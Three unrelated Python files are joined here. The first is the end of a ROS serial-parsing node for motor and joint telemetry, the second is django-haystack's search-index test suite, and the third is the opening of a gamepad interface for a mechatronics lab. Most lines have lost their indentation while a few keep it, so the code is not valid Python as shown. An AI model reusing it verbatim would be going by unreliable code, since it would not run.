            if received == b'\x00':
                line = line[:-1]
                line = line.strip()
            if received.decode() == "!" or received.decode() == "#":
                signo = 1 if received.decode() == "!" else -1
                numero = np.float32(signo * int(line[1:5]))
                codigo = line[0]
                # print(line)
                ## Determine what type of message is arriving and what it corresponds to
if codigo == 'A':
#L0_current = numero
current_present.L1_C=numero/140
elif codigo == 'B':
#L1_current = numero
current_present.L0_C = numero/140
elif codigo == 'C':
#L2_current = numero
current_present.L2_C = numero/140
elif codigo == 'D':
#R0_current = numero
current_present.R0_C = numero/140
elif codigo == 'E':
#R1_current = numero
current_present.R1_C = numero/140
elif codigo == 'F':
#R2_current = numero
current_present.R2_C = numero/140
elif codigo == 'G':
#joint0 = numero
pots_present.J0 = numero
elif codigo == 'H':
#joint1 = numero
pots_present.J1 = numero
elif codigo == 'I':
#joint2 = numero
pots_present.J2 = numero
elif codigo == 'J':
#joint3 = numero
pots_present.J3 = numero
elif codigo == 'K':
#joint4 = numero
pots_present.J4 = numero
elif codigo == 'L':
#joint5 = numero
pots_present.J5 = numero
elif codigo == 'M':
#joint6 = numero
pots_present.J6 = numero
elif codigo == 'N':
#L0_speed = numero
rpm_present.L1_V = -numero
elif codigo == 'O':
#L1_speed = numero
rpm_present.L2_V = -numero
elif codigo == 'P':
#L2_speed = numero
rpm_present.L0_V = -numero
elif codigo == 'Q':
#R0_speed = numero
rpm_present.R2_V = numero
elif codigo == 'R':
#R1_speed = numero
rpm_present.R1_V = numero
elif codigo == 'S':
#R2_speed = numero
rpm_present.R0_V = numero
pub_Current.publish(current_present)
pub_Pots.publish(pots_present)
pub_RPM.publish(rpm_present)
elif codigo == "X":
pub_PID.publish(PID_present)
line = ""
        except Exception:
            # malformed frame or serial hiccup: drop the partial line and resync
            line = ""
if __name__ == '__main__':
try:
node_fpga()
except rospy.ROSInterruptException:
pass
|
test_indexes.py
|
# encoding: utf-8
import datetime
import queue
import time
from threading import Thread
from django.test import TestCase
from test_haystack.core.models import (
AFifthMockModel,
AnotherMockModel,
AThirdMockModel,
ManyToManyLeftSideModel,
ManyToManyRightSideModel,
MockModel,
)
from haystack import connections, indexes
from haystack.exceptions import SearchFieldError
from haystack.utils.loading import UnifiedIndex
class BadSearchIndex1(indexes.SearchIndex, indexes.Indexable):
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
def get_model(self):
return MockModel
class BadSearchIndex2(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
content2 = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
def get_model(self):
return MockModel
class GoodMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
extra = indexes.CharField(indexed=False, use_template=True)
def get_model(self):
return MockModel
# For testing inheritance...
class AltGoodMockSearchIndex(GoodMockSearchIndex, indexes.Indexable):
additional = indexes.CharField(model_attr="author")
def get_model(self):
return MockModel
class GoodCustomMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author", faceted=True)
pub_date = indexes.DateTimeField(model_attr="pub_date", faceted=True)
extra = indexes.CharField(indexed=False, use_template=True)
hello = indexes.CharField(model_attr="hello")
def prepare(self, obj):
super(GoodCustomMockSearchIndex, self).prepare(obj)
self.prepared_data["whee"] = "Custom preparation."
return self.prepared_data
def prepare_author(self, obj):
return "Hi, I'm %s" % self.prepared_data["author"]
def load_all_queryset(self):
return self.get_model()._default_manager.filter(id__gt=1)
def get_model(self):
return MockModel
def index_queryset(self, using=None):
return MockModel.objects.all()
def read_queryset(self, using=None):
return MockModel.objects.filter(author__in=["daniel1", "daniel3"])
def build_queryset(self, start_date=None, end_date=None):
return MockModel.objects.filter(author__in=["daniel1", "daniel3"])
class GoodNullableMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author", null=True, faceted=True)
def get_model(self):
return MockModel
class GoodOverriddenFieldNameMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(
document=True, use_template=True, index_fieldname="more_content"
)
author = indexes.CharField(model_attr="author", index_fieldname="name_s")
hello = indexes.CharField(model_attr="hello")
def get_model(self):
return MockModel
class GoodFacetedMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
author_foo = indexes.FacetCharField(facet_for="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
pub_date_exact = indexes.FacetDateTimeField(facet_for="pub_date")
def get_model(self):
return MockModel
def prepare_author(self, obj):
return "Hi, I'm %s" % self.prepared_data["author"]
def prepare_pub_date_exact(self, obj):
return "2010-10-26T01:54:32"
class MROFieldsSearchIndexA(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="test_a")
def get_model(self):
return MockModel
class MROFieldsSearchIndexB(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="test_b")
def get_model(self):
return MockModel
class MROFieldsSearchChild(MROFieldsSearchIndexA, MROFieldsSearchIndexB):
pass
class ModelWithManyToManyFieldAndAttributeLookupSearchIndex(
indexes.SearchIndex, indexes.Indexable
):
text = indexes.CharField(document=True)
related_models = indexes.MultiValueField(model_attr="related_models__name")
def get_model(self):
return ManyToManyLeftSideModel
class SearchIndexTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super(SearchIndexTestCase, self).setUp()
self.sb = connections["default"].get_backend()
self.mi = GoodMockSearchIndex()
self.cmi = GoodCustomMockSearchIndex()
self.cnmi = GoodNullableMockSearchIndex()
self.gfmsi = GoodFacetedMockSearchIndex()
# Fake the unified index.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.ui.build(indexes=[self.mi])
connections["default"]._index = self.ui
self.sample_docs = {
"core.mockmodel.1": {
"text": "Indexed!\n1",
"django_id": "1",
"django_ct": "core.mockmodel",
"extra": "Stored!\n1",
"author": "daniel1",
"pub_date": datetime.datetime(2009, 3, 17, 6, 0),
"id": "core.mockmodel.1",
},
"core.mockmodel.2": {
"text": "Indexed!\n2",
"django_id": "2",
"django_ct": "core.mockmodel",
"extra": "Stored!\n2",
"author": "daniel2",
"pub_date": datetime.datetime(2009, 3, 17, 7, 0),
"id": "core.mockmodel.2",
},
"core.mockmodel.3": {
"text": "Indexed!\n3",
"django_id": "3",
"django_ct": "core.mockmodel",
"extra": "Stored!\n3",
"author": "daniel3",
"pub_date": datetime.datetime(2009, 3, 17, 8, 0),
"id": "core.mockmodel.3",
},
}
def tearDown(self):
connections["default"]._index = self.old_unified_index
super(SearchIndexTestCase, self).tearDown()
def test_no_contentfield_present(self):
self.assertRaises(SearchFieldError, BadSearchIndex1)
def test_too_many_contentfields_present(self):
self.assertRaises(SearchFieldError, BadSearchIndex2)
    def test_contentfield_present(self):
        try:
            GoodMockSearchIndex()
        except Exception:
            self.fail("GoodMockSearchIndex should not raise on construction")
def test_proper_fields(self):
self.assertEqual(len(self.mi.fields), 4)
self.assertTrue("text" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["text"], indexes.CharField))
self.assertTrue("author" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("extra" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["extra"], indexes.CharField))
self.assertEqual(len(self.cmi.fields), 7)
self.assertTrue("text" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["text"], indexes.CharField))
self.assertTrue("author" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["author"], indexes.CharField))
self.assertTrue("author_exact" in self.cmi.fields)
self.assertTrue(
isinstance(self.cmi.fields["author_exact"], indexes.FacetCharField)
)
self.assertTrue("pub_date" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("pub_date_exact" in self.cmi.fields)
self.assertTrue(
isinstance(self.cmi.fields["pub_date_exact"], indexes.FacetDateTimeField)
)
self.assertTrue("extra" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["extra"], indexes.CharField))
self.assertTrue("hello" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["extra"], indexes.CharField))
def test_index_queryset(self):
self.assertEqual(len(self.cmi.index_queryset()), 3)
def test_read_queryset(self):
self.assertEqual(len(self.cmi.read_queryset()), 2)
def test_build_queryset(self):
# The custom SearchIndex.build_queryset returns the same records as
# the read_queryset
self.assertEqual(len(self.cmi.build_queryset()), 2)
# Store a reference to the original method
old_guf = self.mi.__class__.get_updated_field
self.mi.__class__.get_updated_field = lambda self: "pub_date"
        # With an updated field, we should get filtered results
sd = datetime.datetime(2009, 3, 17, 7, 0)
self.assertEqual(len(self.mi.build_queryset(start_date=sd)), 2)
ed = datetime.datetime(2009, 3, 17, 7, 59)
self.assertEqual(len(self.mi.build_queryset(end_date=ed)), 2)
sd = datetime.datetime(2009, 3, 17, 6, 0)
ed = datetime.datetime(2009, 3, 17, 6, 59)
self.assertEqual(len(self.mi.build_queryset(start_date=sd, end_date=ed)), 1)
# Remove the updated field for the next test
del self.mi.__class__.get_updated_field
# The default should return all 3 even if we specify a start date
# because there is no updated field specified
self.assertEqual(len(self.mi.build_queryset(start_date=sd)), 3)
# Restore the original attribute
self.mi.__class__.get_updated_field = old_guf
def test_prepare(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.mi.prepare(mock)), 7)
self.assertEqual(
sorted(self.mi.prepare(mock).keys()),
["author", "django_ct", "django_id", "extra", "id", "pub_date", "text"],
)
def test_custom_prepare(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
def test_thread_safety(self):
        # This is a regression test. ``SearchIndex`` used to write to
        # ``self.prepared_data``, which would leak between threads if things
        # went too fast.
exceptions = []
def threaded_prepare(index_queue, index, model):
try:
index.queue = index_queue
prepped = index.prepare(model)
except Exception as e:
exceptions.append(e)
raise
class ThreadedSearchIndex(GoodMockSearchIndex):
def prepare_author(self, obj):
if obj.pk == 20:
time.sleep(0.1)
else:
time.sleep(0.5)
index_queue.put(self.prepared_data["author"])
return self.prepared_data["author"]
tmi = ThreadedSearchIndex()
index_queue = queue.Queue()
mock_1 = MockModel()
mock_1.pk = 20
mock_1.author = "foo"
mock_1.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
mock_2 = MockModel()
mock_2.pk = 21
mock_2.author = "daniel%s" % mock_2.id
mock_2.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
th1 = Thread(target=threaded_prepare, args=(index_queue, tmi, mock_1))
th2 = Thread(target=threaded_prepare, args=(index_queue, tmi, mock_2))
th1.start()
th2.start()
th1.join()
th2.join()
mock_1_result = index_queue.get()
mock_2_result = index_queue.get()
self.assertEqual(mock_1_result, "foo")
self.assertEqual(mock_2_result, "daniel21")
def test_custom_prepare_author(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(self.cmi.prepared_data["author"], "Hi, I'm daniel20")
self.assertEqual(self.cmi.prepared_data["author_exact"], "Hi, I'm daniel20")
def test_custom_model_attr(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(self.cmi.prepared_data["hello"], "World!")
def test_custom_index_fieldname(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
cofnmi = GoodOverriddenFieldNameMockSearchIndex()
self.assertEqual(len(cofnmi.prepare(mock)), 6)
self.assertEqual(
sorted(cofnmi.prepare(mock).keys()),
["django_ct", "django_id", "hello", "id", "more_content", "name_s"],
)
self.assertEqual(cofnmi.prepared_data["name_s"], "daniel20")
self.assertEqual(cofnmi.get_content_field(), "more_content")
def test_get_content_field(self):
self.assertEqual(self.mi.get_content_field(), "text")
def test_update(self):
self.sb.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
self.mi.update()
self.assertEqual(self.sb.search("*")["hits"], 3)
self.sb.clear()
def test_update_object(self):
self.sb.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "20")],
)
self.sb.clear()
def test_remove_object(self):
self.mi.update()
self.assertEqual(self.sb.search("*")["hits"], 3)
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(self.sb.search("*")["hits"], 4)
self.mi.remove_object(mock)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "1"), ("core.mockmodel", "2"), ("core.mockmodel", "3")],
)
# Put it back so we can test passing kwargs.
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(self.sb.search("*")["hits"], 4)
self.mi.remove_object(mock, commit=False)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[
("core.mockmodel", "1"),
("core.mockmodel", "2"),
("core.mockmodel", "3"),
("core.mockmodel", "20"),
],
)
self.sb.clear()
def test_clear(self):
self.mi.update()
self.assertGreater(self.sb.search("*")["hits"], 0)
self.mi.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
def test_reindex(self):
self.mi.reindex()
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "1"), ("core.mockmodel", "2"), ("core.mockmodel", "3")],
)
self.sb.clear()
    def test_inheritance(self):
        try:
            agmi = AltGoodMockSearchIndex()
        except Exception:
            self.fail("AltGoodMockSearchIndex should inherit without raising")
self.assertEqual(len(agmi.fields), 5)
self.assertTrue("text" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["text"], indexes.CharField))
self.assertTrue("author" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("extra" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["extra"], indexes.CharField))
self.assertTrue("additional" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["additional"], indexes.CharField))
def test_proper_field_resolution(self):
mrofsc = MROFieldsSearchChild()
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
mock.test_a = "This is A"
mock.test_b = "This is B"
self.assertEqual(len(mrofsc.fields), 1)
prepped_data = mrofsc.prepare(mock)
self.assertEqual(len(prepped_data), 4)
self.assertEqual(prepped_data["text"], "This is A")
def test_load_all_queryset(self):
self.assertEqual([obj.id for obj in self.cmi.load_all_queryset()], [2, 3])
def test_nullable(self):
mock = MockModel()
mock.pk = 20
mock.author = None
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
prepared_data = self.cnmi.prepare(mock)
self.assertEqual(len(prepared_data), 6)
self.assertEqual(
sorted(prepared_data.keys()),
["author", "author_exact", "django_ct", "django_id", "id", "text"],
)
prepared_data = self.cnmi.full_prepare(mock)
self.assertEqual(len(prepared_data), 4)
self.assertEqual(
sorted(prepared_data.keys()), ["django_ct", "django_id", "id", "text"]
)
def test_custom_facet_fields(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel"
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
prepared_data = self.gfmsi.prepare(mock)
self.assertEqual(len(prepared_data), 8)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"author_foo",
"django_ct",
"django_id",
"id",
"pub_date",
"pub_date_exact",
"text",
],
)
prepared_data = self.gfmsi.full_prepare(mock)
self.assertEqual(len(prepared_data), 8)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"author_foo",
"django_ct",
"django_id",
"id",
"pub_date",
"pub_date_exact",
"text",
],
)
self.assertEqual(prepared_data["author_foo"], "Hi, I'm daniel")
self.assertEqual(prepared_data["pub_date_exact"], "2010-10-26T01:54:32")
class BasicModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
class FieldsModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
fields = ["author", "pub_date"]
class ExcludesModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
excludes = ["author", "foo"]
class FieldsWithOverrideModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
foo = indexes.IntegerField(model_attr="foo")
class Meta:
model = MockModel
fields = ["author", "foo"]
def get_index_fieldname(self, f):
if f.name == "author":
return "author_bar"
else:
return f.name
class YetAnotherBasicModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
class Meta:
model = AThirdMockModel
class PolymorphicModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
average_delay = indexes.FloatField(null=True)
def get_model(self):
return AnotherMockModel
def prepare(self, obj):
self.prepared_data = super(PolymorphicModelSearchIndex, self).prepare(obj)
if isinstance(obj, AThirdMockModel):
self.prepared_data["average_delay"] = obj.average_delay
return self.prepared_data
def index_queryset(self, using=None):
return self.get_model().objects.all()
class GhettoAFifthMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
def get_model(self):
return AFifthMockModel
def index_queryset(self, using=None):
        # Index everything.
return self.get_model().objects.complete_set()
def read_queryset(self, using=None):
return self.get_model().objects.all()
class ReadQuerySetTestSearchIndex(indexes.SearchIndex, indexes.Indexable):
author = indexes.CharField(model_attr="author", document=True)
def get_model(self):
return AFifthMockModel
def read_queryset(self, using=None):
return self.get_model().objects.complete_set()
class TextReadQuerySetTestSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr="author", document=True)
def get_model(self):
return AFifthMockModel
def read_queryset(self, using=None):
return self.get_model().objects.complete_set()
class ModelWithManyToManyFieldModelSearchIndex(indexes.ModelSearchIndex):
def get_model(self):
return ManyToManyLeftSideModel
class ModelSearchIndexTestCase(TestCase):
def setUp(self):
super(ModelSearchIndexTestCase, self).setUp()
self.sb = connections["default"].get_backend()
self.bmsi = BasicModelSearchIndex()
self.fmsi = FieldsModelSearchIndex()
self.emsi = ExcludesModelSearchIndex()
self.fwomsi = FieldsWithOverrideModelSearchIndex()
self.yabmsi = YetAnotherBasicModelSearchIndex()
self.m2mmsi = ModelWithManyToManyFieldModelSearchIndex()
def test_basic(self):
self.assertEqual(len(self.bmsi.fields), 4)
self.assertTrue("foo" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["foo"], indexes.CharField))
self.assertEqual(self.bmsi.fields["foo"].null, False)
self.assertEqual(self.bmsi.fields["foo"].index_fieldname, "foo")
self.assertTrue("author" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["author"], indexes.CharField))
self.assertEqual(self.bmsi.fields["author"].null, False)
self.assertTrue("pub_date" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue(
isinstance(self.bmsi.fields["pub_date"].default, datetime.datetime)
)
self.assertTrue("text" in self.bmsi.fields)
self.assertTrue(isinstance(self.bmsi.fields["text"], indexes.CharField))
self.assertEqual(self.bmsi.fields["text"].document, True)
self.assertEqual(self.bmsi.fields["text"].use_template, True)
def test_fields(self):
self.assertEqual(len(self.fmsi.fields), 3)
self.assertTrue("author" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("text" in self.fmsi.fields)
self.assertTrue(isinstance(self.fmsi.fields["text"], indexes.CharField))
def test_excludes(self):
self.assertEqual(len(self.emsi.fields), 2)
self.assertTrue("pub_date" in self.emsi.fields)
self.assertTrue(isinstance(self.emsi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("text" in self.emsi.fields)
self.assertTrue(isinstance(self.emsi.fields["text"], indexes.CharField))
self.assertNotIn("related_models", self.m2mmsi.fields)
def test_fields_with_override(self):
self.assertEqual(len(self.fwomsi.fields), 3)
self.assertTrue("author" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["author"], indexes.CharField))
self.assertTrue("foo" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["foo"], indexes.IntegerField))
self.assertTrue("text" in self.fwomsi.fields)
self.assertTrue(isinstance(self.fwomsi.fields["text"], indexes.CharField))
    def test_overriding_field_name_with_get_index_fieldname(self):
        # assertTrue with a second argument treats it as a failure message and
        # always passes for truthy values; assertEqual is what is intended here
        self.assertEqual(self.fwomsi.fields["foo"].index_fieldname, "foo")
        self.assertEqual(self.fwomsi.fields["author"].index_fieldname, "author_bar")
def test_float_integer_fields(self):
self.assertEqual(len(self.yabmsi.fields), 5)
self.assertEqual(
sorted(self.yabmsi.fields.keys()),
["author", "average_delay", "pub_date", "text", "view_count"],
)
self.assertTrue("author" in self.yabmsi.fields)
self.assertTrue(isinstance(self.yabmsi.fields["author"], indexes.CharField))
self.assertEqual(self.yabmsi.fields["author"].null, False)
self.assertTrue("pub_date" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["pub_date"], indexes.DateTimeField)
)
self.assertTrue(
isinstance(self.yabmsi.fields["pub_date"].default, datetime.datetime)
)
self.assertTrue("text" in self.yabmsi.fields)
self.assertTrue(isinstance(self.yabmsi.fields["text"], indexes.CharField))
self.assertEqual(self.yabmsi.fields["text"].document, True)
self.assertEqual(self.yabmsi.fields["text"].use_template, False)
self.assertTrue("view_count" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["view_count"], indexes.IntegerField)
)
self.assertEqual(self.yabmsi.fields["view_count"].null, False)
self.assertEqual(self.yabmsi.fields["view_count"].index_fieldname, "view_count")
self.assertTrue("average_delay" in self.yabmsi.fields)
self.assertTrue(
isinstance(self.yabmsi.fields["average_delay"], indexes.FloatField)
)
self.assertEqual(self.yabmsi.fields["average_delay"].null, False)
self.assertEqual(
self.yabmsi.fields["average_delay"].index_fieldname, "average_delay"
)
class ModelWithManyToManyFieldAndAttributeLookupSearchIndexTestCase(TestCase):
def test_full_prepare(self):
index = ModelWithManyToManyFieldAndAttributeLookupSearchIndex()
left_model = ManyToManyLeftSideModel.objects.create()
right_model_1 = ManyToManyRightSideModel.objects.create(name="Right side 1")
right_model_2 = ManyToManyRightSideModel.objects.create()
left_model.related_models.add(right_model_1)
left_model.related_models.add(right_model_2)
result = index.full_prepare(left_model)
self.assertDictEqual(
result,
{
"django_ct": "core.manytomanyleftsidemodel",
"django_id": "1",
"text": None,
"id": "core.manytomanyleftsidemodel.1",
"related_models": ["Right side 1", "Default name"],
},
)
class PolymorphicModelTestCase(TestCase):
def test_prepare_with_polymorphic(self):
index = PolymorphicModelSearchIndex()
parent_model = AnotherMockModel()
parent_model.author = "Paul"
parent_model.pub_date = datetime.datetime(2018, 5, 23, 13, 57)
parent_model.save()
child_model = AThirdMockModel()
child_model.author = "Paula"
child_model.pub_date = datetime.datetime(2018, 5, 23, 13, 58)
child_model.average_delay = 0.5
child_model.save()
prepared_data = index.prepare(parent_model)
self.assertEqual(len(prepared_data), 7)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"average_delay",
"django_ct",
"django_id",
"id",
"pub_date",
"text",
],
)
self.assertEqual(prepared_data["django_ct"], "core.anothermockmodel")
self.assertEqual(prepared_data["average_delay"], None)
prepared_data = index.prepare(child_model)
self.assertEqual(len(prepared_data), 7)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"average_delay",
"django_ct",
"django_id",
"id",
"pub_date",
"text",
],
)
self.assertEqual(prepared_data["django_ct"], "core.anothermockmodel")
self.assertEqual(prepared_data["average_delay"], 0.5)
|
game_pad_interface.py
|
#!/usr/bin/env python
'''
MEGN540 Mechatronics Lab
Copyright (C) Andrew Petruska, 2021.
apetruska [at] mines [dot] edu
www.mechanical.mines.edu
'''
'''
Copyright (c) 2021 Andrew Petruska at Colorado School of Mines
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from inputs_mod import get_gamepad, devices
# FOR THREADING AND MUTEX PROTECTION (used in serial interface primarily)
from threading import Thread, Lock
import collections # FOR DEQUEUE USED IN DATA STORAGE AND CALLBACK QUEUES
import time
class MEGN540_GamePadInterface:
def __init__(self):
self.is_running = False
self.thread = None
self.cb_thread = None
self.cbk_list = collections.deque()
self.callback_list_mutex = Lock()
self.rate_mutex = Lock()
self.last_send_time = time.perf_counter()
self.gamepad = None
self.lin_vel = 0
self.ang_vel = 0
self.changed = True
def connect(self):
if self.is_running is False and len(devices.gamepads) > 0:
if not self.gamepad:
self.gamepad = devices.gamepads[0]
self.thread = Thread(target=self.event_thread)
self.is_running = True
self.thread.start()
self.cb_thread = Thread(target=self.process_callbacks)
self.cb_thread.start()
print("Game Pad Event Handler Started")
else:
print("Could not connect to gamepad.")
def disconnect(self):
self.is_running = False
self.gamepad = None
if self.thread:
self.thread.join(0.1)
if self.cb_thread:
self.cb_thread.join(0.1)
self.thread = None
self.cb_thread = None
def is_connected(self):
return self.is_running
def add_callback(self, cbk_function):
self.callback_list_mutex.acquire()
try:
self.cbk_list.append(cbk_function)
finally:
self.callback_list_mutex.release()
def rm_callback(self, cbk_function):
self.callback_list_mutex.acquire()
try:
self.cbk_list.remove(cbk_function)
finally:
self.callback_list_mutex.release()
def rumble_pad(self):
self.gamepad.set_vibration(1, 0, 1000)
    def event_thread(self):
        while self.is_running:
            try:
                events = devices.gamepads[0]._do_iter()
                # events = get_gamepad()
                if events is None:
                    time.sleep(0.0001)
                    continue
                for event in events:
                    # compare strings with ==; 'is' only worked by interning accident
                    if event.ev_type == "Absolute":
                        try:
                            self.rate_mutex.acquire()
                            if event.code == "ABS_X":
                                # self.ang_vel = -6.28*(event.state-128)/128
                                # self.changed = True
                                continue
                            elif event.code == "ABS_Y":
                                self.lin_vel = -0.5*(event.state-128)/128
                                self.changed = True
                            elif event.code == "ABS_RZ":
